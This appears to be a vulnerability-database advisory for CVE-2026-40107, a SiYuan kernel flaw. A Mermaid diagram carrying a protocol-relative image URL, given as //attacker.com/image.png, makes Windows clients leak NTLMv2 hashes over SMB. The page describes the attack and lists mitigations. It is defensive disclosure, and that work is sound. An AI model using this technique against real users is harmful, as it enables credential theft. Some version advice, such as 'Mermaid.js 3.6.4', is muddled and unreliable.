Platform
go
Component
github.com/siyuan-note/siyuan/kernel
Fixed in
3.6.5
0.0.0-20260407035653-2f416e5253f1
CVE-2026-40107 describes a Server-Side Request Forgery (SSRF) vulnerability within the SiYuan Kernel, the core of the SiYuan note-taking application. This flaw allows an attacker to induce the application to make requests to arbitrary URLs, potentially leading to data exfiltration or unauthorized access. The vulnerability stems from insecure configuration of Mermaid.js and is addressed in version 0.0.0-20260407035653-2f416e5253f1.
An attacker can exploit this SSRF vulnerability by crafting a malicious Mermaid diagram containing an <img> tag with a protocol-relative URL. When a victim opens a note containing this diagram within the SiYuan Electron client, the client will attempt to fetch the image from the attacker-controlled URL. Critically, on Windows systems, a protocol-relative URL (//attacker.com/image.png) resolves to a UNC path (\\attacker.com\image.png), triggering an automatic SMB authentication attempt. This exposes the victim's NTLMv2 hash to the attacker, facilitating potential credential theft and lateral movement within the network. The blast radius extends to any systems accessible via SMB from the compromised SiYuan client.
This vulnerability was publicly disclosed on 2026-04-10. There is currently no indication of active exploitation campaigns targeting CVE-2026-40107. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is likely to emerge given the relatively straightforward nature of the SSRF exploitation pattern.
Exploit Status
EPSS
0.06% (18% percentile)
CISA SSVC
The primary mitigation for CVE-2026-40107 is to upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. If an immediate upgrade is not feasible, consider temporarily disabling Mermaid diagrams within SiYuan or restricting the URLs that can be accessed via Mermaid.js. While not a complete solution, configuring a Web Application Firewall (WAF) to block requests to suspicious URLs or restrict access to SMB ports could provide an additional layer of defense. After upgrading, confirm the fix by attempting to load a note containing a malicious Mermaid diagram with a protocol-relative URL; the request should be blocked or sanitized.
Update the Mermaid.js library to version 3.6.4 or higher to mitigate the vulnerability. Ensure you configure `securityLevel: 'strict'` and disable `htmlLabels: true` to prevent malicious code injection through Mermaid diagrams.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-40107 is a Server-Side Request Forgery (SSRF) vulnerability in SiYuan Kernel, allowing attackers to trigger arbitrary URL fetches via malicious Mermaid diagrams.
You are affected if you are using a version of SiYuan Kernel prior to 0.0.0-20260407035653-2f416e5253f1 and utilize Mermaid diagrams.
Upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. Consider temporarily disabling Mermaid diagrams as a workaround.
There is currently no indication of active exploitation campaigns targeting CVE-2026-40107, but public proof-of-concept code is likely.
Refer to the SiYuan project's official release notes and security advisories for the most up-to-date information: [https://github.com/siyuan-note/siyuan/releases](https://github.com/siyuan-note/siyuan/releases)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your go.mod file and we'll tell you instantly if you're affected.